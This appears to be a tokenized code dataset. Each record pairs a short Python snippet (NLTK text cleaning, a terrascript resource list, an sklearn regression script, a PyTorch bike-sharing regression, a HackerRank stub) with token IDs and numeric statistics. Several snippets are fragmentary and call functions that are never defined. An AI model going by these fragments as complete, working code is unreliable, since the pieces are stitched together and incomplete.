374,
13,
67,
413,
3849,
201,
198,
37811,
201,
198,
11748,
299,
32152,
355,
45941,
201,
198,
220,
220,
220,
220,
201,
198,
2,
11748,
2603,
29487,
8019,
13,
9078,
29487,
355,
458,
83,
201,
198,
2,
6738,
285,
489,
62,
25981,
74,
896,
13,
76,
29487,
18,
67,
1330,
12176,
274,
18,
35,
201,
198,
2,
81,
782,
9452,
796,
45941,
13,
9107,
418,
7,
24,
8,
201,
198,
2,
81,
782,
11518,
796,
45941,
13,
1952,
7,
24,
8,
201,
198,
2,
77,
19852,
796,
860,
201,
198,
2,
5420,
796,
45941,
13,
18747,
26933,
16,
11,
16,
11,
16,
12962,
201,
198,
2,
17143,
7307,
796,
45941,
13,
28920,
19510,
2167,
11,
24,
4008,
201,
198,
2,
15252,
1083,
796,
45941,
13,
28920,
19510,
2167,
11,
18,
4008,
201,
198,
2,
1102,
2536,
6003,
796,
45941,
13,
28920,
19510,
2167,
11,
18,
4008,
201,
198,
2,
15252,
1083,
58,
47715,
796,
657,
201,
198,
2,
1102,
2536,
6003,
58,
47715,
796,
657,
201,
198,
2,
17143,
7307,
58,
25,
22241,
657,
201,
198,
2,
1640,
1312,
287,
2837,
7,
2167,
2599,
201,
198,
2,
220,
220,
220,
2124,
796,
45941,
13,
25120,
13,
25192,
7,
77,
19852,
27493,
7,
81,
782,
11518,
12,
81,
782,
9452,
47762,
81,
782,
9452,
201,
198,
2,
220,
220,
220,
10007,
58,
72,
60,
796,
2124,
201,
198,
2,
220,
220,
220,
26181,
11,
762,
796,
360,
14990,
57,
23,
7,
87,
8,
201,
198,
2,
220,
220,
220,
15221,
58,
72,
60,
796,
26181,
201,
198,
2,
220,
220,
220,
17778,
58,
72,
60,
796,
762,
201,
198,
2,
201,
198,
2,
64,
796,
45941,
13,
16345,
7,
1102,
2536,
6003,
27,
15,
11,
16488,
28,
16,
8,
855,
18,
201,
198,
2235,
16345,
7,
64,
8,
201,
198,
2,
5647,
796,
458,
83,
13,
26875,
3419,
201,
198,
2,
897,
796,
2336,
13,
2860,
62,
7266,
29487,
7,
16243,
11,
16302,
295,
11639,
18,
67,
11537,
201,
198,
2,
897,
13,
1416,
1436,
7,
15252,
1083,
58,
64,
7131,
45299,
15,
4357,
15221,
58,
64,
7131,
45299,
16,
4357,
15221,
58,
64,
7131,
45299,
17,
12962,
201,
198,
2,
5647,
13,
12860,
3419
] | 2.049875 | 401 |
"""
Helper script used for turning text into tf-idf vector for the knn experiment
"""
import re
import numpy
from nltk import pos_tag
from nltk.corpus import stopwords
from nltk.corpus import wordnet
from nltk.stem import SnowballStemmer
from nltk.stem import WordNetLemmatizer
from nltk.tokenize import word_tokenize
from sklearn.feature_extraction.text import TfidfVectorizer
def cleanText(text, lemmatize, stemmer):
"""Method for cleaning text. Removes numbers, punctuation, and capitalization. Stems or lemmatizes text."""
if isinstance(text, float):
text = str(text)
if isinstance(text, numpy.int64):
text = str(text)
try:
text = text.decode()
except AttributeError:
pass
text = re.sub(r"[^A-Za-z]", " ", text)
text = text.lower()
if lemmatize:
wordnet_lemmatizer = WordNetLemmatizer()
text_result = []
tokens = word_tokenize(text) # Generate list of tokens
tagged = pos_tag(tokens)
for t in tagged:
try:
text_result.append(wordnet_lemmatizer.lemmatize(t[0], get_tag(t[1][:2])))
except:
text_result.append(wordnet_lemmatizer.lemmatize(t[0]))
return text_result
if stemmer:
text_result = []
tokens = word_tokenize(text)
snowball_stemmer = SnowballStemmer('english')
for t in tokens:
text_result.append(snowball_stemmer.stem(t))
return text_result
| [
37811,
201,
198,
47429,
4226,
973,
329,
6225,
2420,
656,
48700,
12,
312,
69,
15879,
329,
262,
638,
77,
6306,
201,
198,
37811,
201,
198,
201,
198,
11748,
302,
201,
198,
201,
198,
11748,
299,
32152,
201,
198,
6738,
299,
2528,
74,
1330,
1426,
62,
12985,
201,
198,
6738,
299,
2528,
74,
13,
10215,
79,
385,
1330,
2245,
10879,
201,
198,
6738,
299,
2528,
74,
13,
10215,
79,
385,
1330,
1573,
3262,
201,
198,
6738,
299,
2528,
74,
13,
927,
1330,
7967,
1894,
1273,
368,
647,
201,
198,
6738,
299,
2528,
74,
13,
927,
1330,
9678,
7934,
43,
368,
6759,
7509,
201,
198,
6738,
299,
2528,
74,
13,
30001,
1096,
1330,
1573,
62,
30001,
1096,
201,
198,
6738,
1341,
35720,
13,
30053,
62,
2302,
7861,
13,
5239,
1330,
309,
69,
312,
69,
38469,
7509,
201,
198,
201,
198,
201,
198,
4299,
3424,
8206,
7,
5239,
11,
443,
3020,
265,
1096,
11,
10717,
647,
2599,
201,
198,
220,
220,
220,
37227,
17410,
329,
12724,
2420,
13,
3982,
5241,
3146,
11,
21025,
2288,
11,
290,
3139,
1634,
13,
520,
5232,
393,
443,
3020,
265,
4340,
2420,
526,
15931,
201,
198,
201,
198,
220,
220,
220,
611,
318,
39098,
7,
5239,
11,
12178,
2599,
201,
198,
220,
220,
220,
220,
220,
220,
220,
2420,
796,
965,
7,
5239,
8,
201,
198,
220,
220,
220,
611,
318,
39098,
7,
5239,
11,
299,
32152,
13,
600,
2414,
2599,
201,
198,
220,
220,
220,
220,
220,
220,
220,
2420,
796,
965,
7,
5239,
8,
201,
198,
220,
220,
220,
1949,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
2420,
796,
2420,
13,
12501,
1098,
3419,
201,
198,
220,
220,
220,
2845,
3460,
4163,
12331,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
1208,
201,
198,
201,
198,
220,
220,
220,
2420,
796,
302,
13,
7266,
7,
81,
17912,
61,
32,
12,
57,
64,
12,
89,
60,
1600,
366,
33172,
2420,
8,
201,
198,
220,
220,
220,
2420,
796,
2420,
13,
21037,
3419,
201,
198,
201,
198,
220,
220,
220,
611,
443,
3020,
265,
1096,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
1573,
3262,
62,
293,
3020,
265,
7509,
796,
9678,
7934,
43,
368,
6759,
7509,
3419,
201,
198,
201,
198,
220,
220,
220,
220,
220,
220,
220,
2420,
62,
20274,
796,
17635,
201,
198,
220,
220,
220,
220,
220,
220,
220,
16326,
796,
1573,
62,
30001,
1096,
7,
5239,
8,
220,
1303,
2980,
378,
1351,
286,
16326,
201,
198,
220,
220,
220,
220,
220,
220,
220,
30509,
796,
1426,
62,
12985,
7,
83,
482,
641,
8,
201,
198,
220,
220,
220,
220,
220,
220,
220,
329,
256,
287,
30509,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1949,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2420,
62,
20274,
13,
33295,
7,
4775,
3262,
62,
293,
3020,
265,
7509,
13,
293,
3020,
265,
1096,
7,
83,
58,
15,
4357,
651,
62,
12985,
7,
83,
58,
16,
7131,
25,
17,
60,
22305,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2845,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2420,
62,
20274,
13,
33295,
7,
4775,
3262,
62,
293,
3020,
265,
7509,
13,
293,
3020,
265,
1096,
7,
83,
58,
15,
60,
4008,
201,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
2420,
62,
20274,
201,
198,
201,
198,
220,
220,
220,
611,
10717,
647,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
2420,
62,
20274,
796,
17635,
201,
198,
220,
220,
220,
220,
220,
220,
220,
16326,
796,
1573,
62,
30001,
1096,
7,
5239,
8,
201,
198,
220,
220,
220,
220,
220,
220,
220,
46275,
62,
927,
647,
796,
7967,
1894,
1273,
368,
647,
10786,
39126,
11537,
201,
198,
220,
220,
220,
220,
220,
220,
220,
329,
256,
287,
16326,
25,
201,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2420,
62,
20274,
13,
33295,
7,
82,
2197,
1894,
62,
927,
647,
13,
927,
7,
83,
4008,
201,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
2420,
62,
20274,
201,
198,
201,
198
] | 2.187767 | 703 |
import os.path
DATA_DIRECTORY = os.path.join(os.path.dirname(__file__), 'data')
| [
11748,
28686,
13,
6978,
198,
198,
26947,
62,
17931,
23988,
15513,
796,
28686,
13,
6978,
13,
22179,
7,
418,
13,
6978,
13,
15908,
3672,
7,
834,
7753,
834,
828,
705,
7890,
11537,
198
] | 2.454545 | 33 |
# -*- coding: utf-8 -*-
# test = Solution()
# # print test.lexicographical('apple', 'appld')
# print test.trySet()
test = Solution3()
print test.canFinish([[1, 0], [2, 1], [2, 0]]) | [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
628,
198,
2,
1332,
796,
28186,
3419,
198,
2,
1303,
3601,
1332,
13,
2588,
291,
17046,
10786,
18040,
3256,
705,
1324,
335,
11537,
198,
2,
3601,
1332,
13,
28311,
7248,
3419,
198,
198,
9288,
796,
28186,
18,
3419,
198,
4798,
1332,
13,
5171,
48658,
26933,
58,
16,
11,
657,
4357,
685,
17,
11,
352,
4357,
685,
17,
11,
657,
11907,
8
] | 2.472973 | 74 |
# terrascript/resource/phillbaker/elasticsearch.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:15:48 UTC)
import terrascript
__all__ = [
"elasticsearch_component_template",
"elasticsearch_composable_index_template",
"elasticsearch_index",
"elasticsearch_index_template",
"elasticsearch_ingest_pipeline",
"elasticsearch_kibana_alert",
"elasticsearch_kibana_object",
"elasticsearch_opendistro_destination",
"elasticsearch_opendistro_ism_policy",
"elasticsearch_opendistro_ism_policy_mapping",
"elasticsearch_opendistro_kibana_tenant",
"elasticsearch_opendistro_monitor",
"elasticsearch_opendistro_role",
"elasticsearch_opendistro_roles_mapping",
"elasticsearch_opendistro_user",
"elasticsearch_snapshot_repository",
"elasticsearch_xpack_index_lifecycle_policy",
"elasticsearch_xpack_license",
"elasticsearch_xpack_role",
"elasticsearch_xpack_role_mapping",
"elasticsearch_xpack_snapshot_lifecycle_policy",
"elasticsearch_xpack_user",
"elasticsearch_xpack_watch",
]
| [
2,
8812,
15961,
14,
31092,
14,
746,
359,
65,
3110,
14,
417,
3477,
12947,
13,
9078,
198,
2,
17406,
4142,
7560,
416,
4899,
14,
15883,
8189,
13,
9078,
357,
1731,
12,
19117,
12,
1238,
2481,
1315,
25,
1314,
25,
2780,
18119,
8,
198,
11748,
8812,
15961,
628,
628,
628,
628,
628,
628,
628,
628,
628,
628,
628,
628,
198,
198,
834,
439,
834,
796,
685,
198,
220,
220,
220,
366,
417,
3477,
12947,
62,
42895,
62,
28243,
1600,
198,
220,
220,
220,
366,
417,
3477,
12947,
62,
785,
1930,
540,
62,
9630,
62,
28243,
1600,
198,
220,
220,
220,
366,
417,
3477,
12947,
62,
9630,
1600,
198,
220,
220,
220,
366,
417,
3477,
12947,
62,
9630,
62,
28243,
1600,
198,
220,
220,
220,
366,
417,
3477,
12947,
62,
278,
395,
62,
79,
541,
4470,
1600,
198,
220,
220,
220,
366,
417,
3477,
12947,
62,
74,
571,
2271,
62,
44598,
1600,
198,
220,
220,
220,
366,
417,
3477,
12947,
62,
74,
571,
2271,
62,
15252,
1600,
198,
220,
220,
220,
366,
417,
3477,
12947,
62,
404,
437,
396,
305,
62,
16520,
1883,
1600,
198,
220,
220,
220,
366,
417,
3477,
12947,
62,
404,
437,
396,
305,
62,
1042,
62,
30586,
1600,
198,
220,
220,
220,
366,
417,
3477,
12947,
62,
404,
437,
396,
305,
62,
1042,
62,
30586,
62,
76,
5912,
1600,
198,
220,
220,
220,
366,
417,
3477,
12947,
62,
404,
437,
396,
305,
62,
74,
571,
2271,
62,
1452,
415,
1600,
198,
220,
220,
220,
366,
417,
3477,
12947,
62,
404,
437,
396,
305,
62,
41143,
1600,
198,
220,
220,
220,
366,
417,
3477,
12947,
62,
404,
437,
396,
305,
62,
18090,
1600,
198,
220,
220,
220,
366,
417,
3477,
12947,
62,
404,
437,
396,
305,
62,
305,
829,
62,
76,
5912,
1600,
198,
220,
220,
220,
366,
417,
3477,
12947,
62,
404,
437,
396,
305,
62,
7220,
1600,
198,
220,
220,
220,
366,
417,
3477,
12947,
62,
45380,
9442,
62,
260,
1930,
37765,
1600,
198,
220,
220,
220,
366,
417,
3477,
12947,
62,
87,
8002,
62,
9630,
62,
36195,
47510,
62,
30586,
1600,
198,
220,
220,
220,
366,
417,
3477,
12947,
62,
87,
8002,
62,
43085,
1600,
198,
220,
220,
220,
366,
417,
3477,
12947,
62,
87,
8002,
62,
18090,
1600,
198,
220,
220,
220,
366,
417,
3477,
12947,
62,
87,
8002,
62,
18090,
62,
76,
5912,
1600,
198,
220,
220,
220,
366,
417,
3477,
12947,
62,
87,
8002,
62,
45380,
9442,
62,
36195,
47510,
62,
30586,
1600,
198,
220,
220,
220,
366,
417,
3477,
12947,
62,
87,
8002,
62,
7220,
1600,
198,
220,
220,
220,
366,
417,
3477,
12947,
62,
87,
8002,
62,
8340,
1600,
198,
60,
198
] | 2.492063 | 441 |
import pytest
from ...utilities import iconfont
from ...PyQt import QtGui, QtCore
| [
11748,
12972,
9288,
198,
6738,
2644,
315,
2410,
1330,
7196,
10331,
198,
6738,
2644,
20519,
48,
83,
1330,
33734,
8205,
72,
11,
33734,
14055,
628,
628,
628
] | 3.222222 | 27 |
import argparse, os
from sklearn.linear_model import LogisticRegression
from sklearn.svm import SVR
import pandas as pd
from scipy.io import arff
# to get the summary both logistic-regression and support-vector-machines have to be run once with the output errors option
if __name__ == "__main__":
parser = argparse.ArgumentParser('FSA')
parser.add_argument('--type', type=str, help='which kind of regression', choices=["logistic-regression", "support-vector-machine"])
parser.add_argument('--output-error-values', action='store_true', default=False, help='display error values instead of output')
parser.add_argument('--train', type=str, help='training dataset', default='MC2-train.arff')
parser.add_argument('--predict', type=str, help='prediction dataset', default='MC2-predict.arff')
args = parser.parse_args()
train_data_arff = arff.loadarff(args.train)
train_data = pd.DataFrame(train_data_arff[0])
train_data = train_data.fillna(0)
prediction_data = pd.DataFrame(arff.loadarff(args.predict)[0])
prediction_data = prediction_data.fillna(0)
if args.type == "logistic-regression":
model = train_log_reg(train_data)
else:
model = train_svm(train_data)
if args.output_error_values:
save_error_values(model, train_data, prediction_data, args.type)
else:
model_predict(model, prediction_data)
| [
11748,
1822,
29572,
11,
28686,
198,
6738,
1341,
35720,
13,
29127,
62,
19849,
1330,
5972,
2569,
8081,
2234,
198,
6738,
1341,
35720,
13,
82,
14761,
1330,
311,
13024,
198,
11748,
19798,
292,
355,
279,
67,
198,
6738,
629,
541,
88,
13,
952,
1330,
610,
487,
628,
628,
198,
198,
2,
284,
651,
262,
10638,
1111,
2604,
2569,
12,
2301,
2234,
290,
1104,
12,
31364,
12,
76,
620,
1127,
423,
284,
307,
1057,
1752,
351,
262,
5072,
8563,
3038,
628,
198,
198,
361,
11593,
3672,
834,
6624,
366,
834,
12417,
834,
1298,
198,
220,
220,
220,
30751,
796,
1822,
29572,
13,
28100,
1713,
46677,
10786,
37,
4090,
11537,
198,
220,
220,
220,
30751,
13,
2860,
62,
49140,
10786,
438,
4906,
3256,
2099,
28,
2536,
11,
1037,
11639,
4758,
1611,
286,
20683,
3256,
7747,
28,
14692,
6404,
2569,
12,
2301,
2234,
1600,
366,
11284,
12,
31364,
12,
30243,
8973,
8,
198,
220,
220,
220,
30751,
13,
2860,
62,
49140,
10786,
438,
22915,
12,
18224,
12,
27160,
3256,
2223,
11639,
8095,
62,
7942,
3256,
4277,
28,
25101,
11,
1037,
11639,
13812,
4049,
3815,
2427,
286,
5072,
11537,
628,
220,
220,
220,
30751,
13,
2860,
62,
49140,
10786,
438,
27432,
3256,
2099,
28,
2536,
11,
1037,
11639,
34409,
27039,
3256,
4277,
11639,
9655,
17,
12,
27432,
13,
283,
487,
11537,
198,
220,
220,
220,
30751,
13,
2860,
62,
49140,
10786,
438,
79,
17407,
3256,
2099,
28,
2536,
11,
1037,
11639,
28764,
2867,
27039,
3256,
4277,
11639,
9655,
17,
12,
79,
17407,
13,
283,
487,
11537,
198,
220,
220,
220,
26498,
796,
30751,
13,
29572,
62,
22046,
3419,
628,
220,
220,
220,
4512,
62,
7890,
62,
283,
487,
796,
610,
487,
13,
2220,
283,
487,
7,
22046,
13,
27432,
8,
198,
220,
220,
220,
4512,
62,
7890,
796,
279,
67,
13,
6601,
19778,
7,
27432,
62,
7890,
62,
283,
487,
58,
15,
12962,
198,
220,
220,
220,
4512,
62,
7890,
796,
4512,
62,
7890,
13,
20797,
2616,
7,
15,
8,
628,
220,
220,
220,
17724,
62,
7890,
796,
279,
67,
13,
6601,
19778,
7,
283,
487,
13,
2220,
283,
487,
7,
22046,
13,
79,
17407,
38381,
15,
12962,
198,
220,
220,
220,
17724,
62,
7890,
796,
17724,
62,
7890,
13,
20797,
2616,
7,
15,
8,
628,
220,
220,
220,
611,
26498,
13,
4906,
6624,
366,
6404,
2569,
12,
2301,
2234,
1298,
198,
220,
220,
220,
220,
220,
220,
220,
2746,
796,
4512,
62,
6404,
62,
2301,
7,
27432,
62,
7890,
8,
198,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
2746,
796,
4512,
62,
82,
14761,
7,
27432,
62,
7890,
8,
628,
220,
220,
220,
611,
26498,
13,
22915,
62,
18224,
62,
27160,
25,
198,
220,
220,
220,
220,
220,
220,
220,
3613,
62,
18224,
62,
27160,
7,
19849,
11,
4512,
62,
7890,
11,
17724,
62,
7890,
11,
26498,
13,
4906,
8,
198,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
2746,
62,
79,
17407,
7,
19849,
11,
17724,
62,
7890,
8,
628
] | 2.807229 | 498 |
import numpy as np
"""
Within this file, the predefined functions appearing in the main menu may be defined. If a new one is added, it must be
added to the attributes self.predef_funs_show and self.predef_funs of the PredefinedFunctions class from the MainMenu.py
file. Moreover, these functions must be added to the self.save method from the previous class.
"""
| [
11748,
299,
32152,
355,
45941,
198,
198,
37811,
198,
22005,
428,
2393,
11,
262,
2747,
18156,
5499,
12655,
287,
262,
1388,
6859,
743,
307,
5447,
13,
1002,
257,
649,
530,
318,
2087,
11,
340,
1276,
307,
198,
29373,
284,
262,
12608,
2116,
13,
28764,
891,
62,
12543,
82,
62,
12860,
290,
2116,
13,
28764,
891,
62,
12543,
82,
286,
262,
14322,
18156,
24629,
2733,
1398,
422,
262,
8774,
23381,
13,
9078,
198,
7753,
13,
10968,
11,
777,
5499,
1276,
307,
2087,
284,
262,
2116,
13,
21928,
2446,
422,
262,
2180,
1398,
13,
198,
37811,
628,
628,
198
] | 3.793814 | 97 |
#!/usr/bin/env python3
"""
:problem: https://www.hackerrank.com/challenges/ctci-connected-cell-in-a-grid/problem
"""
from typing import List, Set, Tuple
Cell = Tuple[int, int]
if __name__ == '__main__':
main()
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
37811,
198,
25,
45573,
25,
3740,
1378,
2503,
13,
31153,
8056,
962,
13,
785,
14,
36747,
34120,
14,
310,
979,
12,
15236,
12,
3846,
12,
259,
12,
64,
12,
25928,
14,
45573,
198,
37811,
198,
198,
6738,
19720,
1330,
7343,
11,
5345,
11,
309,
29291,
198,
198,
28780,
796,
309,
29291,
58,
600,
11,
493,
60,
628,
628,
198,
361,
11593,
3672,
834,
6624,
705,
834,
12417,
834,
10354,
198,
220,
220,
220,
1388,
3419,
198
] | 2.55814 | 86 |
# -*- coding: utf-8 -*-
'''
This is a fully connected neural network.
It contains data batching , using Relu activation function,
using adam optimizer and dropout for overfitting.
'''
import torch
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import sklearn
data = pd.read_csv('bike_sharing.csv', index_col=0)
'''
plt.figure(figsize=(8, 6))
#x is yr y is cnt and coloring is based on the spring
sns.barplot('yr', 'cnt', hue = 'season', data = data, ci=None)
plt.legend(loc = 'upper right', bbox_to_anchor=(1.2,0.5))
plt.xlabel('Year')
plt.ylabel('Total number of bikes rented')
plt.title('Number of bikes rented per season')
'''
'''
plt.figure(figsize=(8, 6))
sns.barplot('mnth', 'cnt', hue = 'workingday', data = data, ci=None)
plt.legend(loc = 'upper right', bbox_to_anchor=(1.2,0.5))
plt.xlabel('Year')
plt.ylabel('Total number of bikes rented')
plt.title('Number of bikes rented per month')
'''
#get the seazon field and change each attribute to one column
data = pd.get_dummies(data, columns= ['season'])
#need just these columns
columns = ['registered', 'holiday', 'weekday',
'weathersit', 'temp', 'atemp',
'season_fall', 'season_spring',
'season_summer', 'season_winter']
#features are the input(xtrain) of neural network and target is the ytrain
features=data[columns]
target=data[['cnt']]
#use sklearn for dividing our data to train and test
from sklearn.model_selection import train_test_split
#80 percent of data is for training
X_train, x_test, Y_train, y_test = train_test_split(features,
target,
test_size=0.2)
#change to tensors
X_train_tensor = torch.tensor(X_train.values, dtype = torch.float)
x_test_tensor = torch.tensor(x_test.values, dtype = torch.float)
Y_train_tensor = torch.tensor(Y_train.values, dtype = torch.float)
y_test_tensor = torch.tensor(y_test.values, dtype = torch.float)
'''
batch the data
'''
#use data utils for batching
import torch.utils.data as data_utils
#tensordataset and loader both used to load multiple samples in parallel
train_data = data_utils.TensorDataset(X_train_tensor, Y_train_tensor)
train_loader = data_utils.DataLoader(train_data, batch_size=100, shuffle=True)
features_batch, target_batch = iter(train_loader).next()
inp = X_train_tensor.shape[1]
out = 1
hid = 10
loss_fn = torch.nn.MSELoss()
#making the neural network model
model = torch.nn.Sequential(torch.nn.Linear(inp, hid),
torch.nn.ReLU(),
#dropout is good for overfitting the p is the
#probability of deleting the neuron
torch.nn.Dropout(p=0.2),
torch.nn.Linear(hid, out))
#defining the optimizer
optimizer = torch.optim.Adam(model.parameters(), lr = 0.001)
##############################################
##make epochs based on the train loader size##
##############################################
total_step = len(train_loader)
num_epochs = 10000
#train model based on every batch data
for epoch in range(num_epochs + 1):
for i, (features, target) in enumerate(train_loader):
output = model(features)
loss = loss_fn(output, target)
optimizer.zero_grad()
loss.backward()
optimizer.step()
if epoch % 2000 == 0:
print ('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}'
.format(epoch+1, num_epochs, i+1, total_step, loss.item()))
#evaluate our model
model.eval()
#get all predicted y value for the all x test
with torch.no_grad():
y_pred_tensor = model(x_test_tensor)
y_pred = y_pred_tensor.detach().numpy()
#make a table for comparing between actual and predicted
compare_df = pd.DataFrame({'actual': np.squeeze(y_test.values), 'predicted': np.squeeze(y_pred)})
#show ten random samples of data frame
print(compare_df.sample(10))
print(sklearn.metrics.r2_score(y_test, y_pred))
'''
Pytorch allows our model to be saved. The parameters to the torch.save()
method are the model to be saved followed by the directory path where it
should be saved
'''
torch.save(model, 'my_model')
#We can load a saved model using the torch.load() method
saved_model = torch.load('my_model')
'''
#It is now used exactly how we used the model before it was saved
y_pred_tensor = saved_model(x_test_tensor)
y_pred = y_pred_tensor.detach().numpy()
'''
#comparing the predicted and actual values with plot
plt.figure(figsize=(12, 8))
plt.plot(y_pred, label='Predicted count')
plt.plot(y_test.values, label='Actual count')
plt.legend()
plt.show() | [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
7061,
6,
198,
1212,
318,
257,
3938,
5884,
17019,
3127,
13,
220,
198,
1026,
4909,
1366,
15458,
278,
837,
1262,
4718,
84,
14916,
2163,
11,
198,
3500,
23197,
6436,
7509,
290,
4268,
448,
329,
625,
32232,
13,
198,
7061,
6,
198,
198,
11748,
28034,
198,
11748,
19798,
292,
355,
279,
67,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
2603,
29487,
8019,
13,
9078,
29487,
355,
458,
83,
198,
11748,
1341,
35720,
198,
198,
7890,
796,
279,
67,
13,
961,
62,
40664,
10786,
32256,
62,
21987,
13,
40664,
3256,
6376,
62,
4033,
28,
15,
8,
220,
198,
7061,
6,
198,
489,
83,
13,
26875,
7,
5647,
7857,
16193,
23,
11,
718,
4008,
198,
198,
2,
87,
318,
42635,
331,
318,
269,
429,
290,
33988,
318,
1912,
319,
262,
6076,
198,
82,
5907,
13,
5657,
29487,
10786,
2417,
3256,
705,
66,
429,
3256,
37409,
796,
705,
6230,
3256,
1366,
796,
1366,
11,
269,
72,
28,
14202,
8,
198,
198,
489,
83,
13,
1455,
437,
7,
17946,
796,
705,
45828,
826,
3256,
275,
3524,
62,
1462,
62,
3702,
273,
16193,
16,
13,
17,
11,
15,
13,
20,
4008,
198,
198,
489,
83,
13,
87,
18242,
10786,
17688,
11537,
198,
489,
83,
13,
2645,
9608,
10786,
14957,
1271,
286,
16715,
26399,
11537,
198,
198,
489,
83,
13,
7839,
10786,
15057,
286,
16715,
26399,
583,
1622,
11537,
198,
7061,
6,
198,
7061,
6,
198,
489,
83,
13,
26875,
7,
5647,
7857,
16193,
23,
11,
718,
4008,
198,
82,
5907,
13,
5657,
29487,
10786,
10295,
400,
3256,
705,
66,
429,
3256,
37409,
796,
705,
16090,
820,
3256,
1366,
796,
1366,
11,
269,
72,
28,
14202,
8,
198,
198,
489,
83,
13,
1455,
437,
7,
17946,
796,
705,
45828,
826,
3256,
275,
3524,
62,
1462,
62,
3702,
273,
16193,
16,
13,
17,
11,
15,
13,
20,
4008,
198,
198,
489,
83,
13,
87,
18242,
10786,
17688,
11537,
198,
489,
83,
13,
2645,
9608,
10786,
14957,
1271,
286,
16715,
26399,
11537,
198,
198,
489,
83,
13,
7839,
10786,
15057,
286,
16715,
26399,
583,
1227,
11537,
198,
7061,
6,
198,
2,
1136,
262,
384,
5168,
2214,
290,
1487,
1123,
11688,
284,
530,
5721,
198,
7890,
796,
279,
67,
13,
1136,
62,
67,
39578,
7,
7890,
11,
15180,
28,
37250,
6230,
6,
12962,
198,
2,
31227,
655,
777,
15180,
198,
28665,
82,
796,
37250,
33736,
3256,
705,
37689,
3256,
705,
10464,
820,
3256,
220,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
23563,
48937,
3256,
705,
29510,
3256,
705,
23900,
79,
3256,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
6230,
62,
7207,
3256,
705,
6230,
62,
16469,
3256,
220,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
6230,
62,
16345,
647,
3256,
705,
6230,
62,
40078,
20520,
198,
198,
2,
40890,
389,
262,
5128,
7,
742,
3201,
8,
286,
17019,
3127,
290,
2496,
318,
262,
331,
27432,
198,
40890,
28,
7890,
58,
28665,
82,
60,
198,
16793,
28,
7890,
58,
17816,
66,
429,
6,
11907,
198,
198,
2,
1904,
1341,
35720,
329,
27241,
674,
1366,
284,
4512,
290,
1332,
198,
6738,
1341,
35720,
13,
19849,
62,
49283,
1330,
4512,
62,
9288,
62,
35312,
198,
2,
1795,
1411,
286,
1366,
318,
329,
3047,
198,
55,
62,
27432,
11,
2124,
62,
9288,
11,
575,
62,
27432,
11,
331,
62,
9288,
796,
4512,
62,
9288,
62,
35312,
7,
40890,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2496,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1332,
62,
7857,
28,
15,
13,
17,
8,
198,
2,
3803,
284,
11192,
669,
198,
55,
62,
27432,
62,
83,
22854,
796,
28034,
13,
83,
22854,
7,
55,
62,
27432,
13,
27160,
11,
288,
4906,
796,
28034,
13,
22468,
8,
198,
87,
62,
9288,
62,
83,
22854,
796,
28034,
13,
83,
22854,
7,
87,
62,
9288,
13,
27160,
11,
288,
4906,
796,
28034,
13,
22468,
8,
198,
198,
56,
62,
27432,
62,
83,
22854,
796,
28034,
13,
83,
22854,
7,
56,
62,
27432,
13,
27160,
11,
288,
4906,
796,
28034,
13,
22468,
8,
198,
88,
62,
9288,
62,
83,
22854,
796,
28034,
13,
83,
22854,
7,
88,
62,
9288,
13,
27160,
11,
288,
4906,
796,
28034,
13,
22468,
8,
198,
198,
7061,
6,
198,
43501,
262,
1366,
198,
7061,
6,
198,
2,
1904,
1366,
3384,
4487,
329,
15458,
278,
198,
11748,
28034,
13,
26791,
13,
7890,
355,
1366,
62,
26791,
220,
198,
198,
2,
83,
641,
585,
265,
292,
316,
290,
40213,
1111,
973,
284,
3440,
3294,
8405,
287,
10730,
198,
27432,
62,
7890,
796,
1366,
62,
26791,
13,
51,
22854,
27354,
292,
316,
7,
55,
62,
27432,
62,
83,
22854,
11,
575,
62,
27432,
62,
83,
22854,
8,
198,
27432,
62,
29356,
796,
1366,
62,
26791,
13,
6601,
17401,
7,
27432,
62,
7890,
11,
15458,
62,
7857,
28,
3064,
11,
36273,
28,
17821,
8,
198,
40890,
62,
43501,
11,
2496,
62,
43501,
796,
11629,
7,
27432,
62,
29356,
737,
19545,
3419,
628,
198,
259,
79,
796,
1395,
62,
27432,
62,
83,
22854,
13,
43358,
58,
16,
60,
198,
448,
796,
352,
198,
198,
49675,
796,
838,
198,
198,
22462,
62,
22184,
796,
28034,
13,
20471,
13,
5653,
3698,
793,
3419,
198,
198,
2,
8601,
262,
17019,
3127,
2746,
198,
19849,
796,
28034,
13,
20471,
13,
44015,
1843,
7,
13165,
354,
13,
20471,
13,
14993,
451,
7,
